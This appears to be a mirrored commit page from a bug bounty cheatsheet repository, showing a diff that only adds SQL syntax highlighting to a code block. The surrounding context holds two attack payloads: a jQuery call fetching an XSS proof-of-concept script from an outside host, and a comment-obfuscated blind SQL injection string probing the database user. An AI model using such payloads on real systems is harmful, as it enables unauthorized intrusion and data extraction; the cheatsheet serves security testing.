mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-22 11:03:14 +00:00
Add SQL syntax highlighting.
This commit is contained in:
parent
21ca7520b3
commit
149f59a4ab
1 changed files with 1 additions and 1 deletions
|
@ -41,7 +41,7 @@ $.get('https://edwinfoudil.com/poc/jqueryxss.js')
|
|||
|
||||
Final example:
|
||||
|
||||
```
|
||||
```sql
|
||||
444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#
|
||||
```
|
||||
|
||||
|
|
Loading…
Reference in a new issue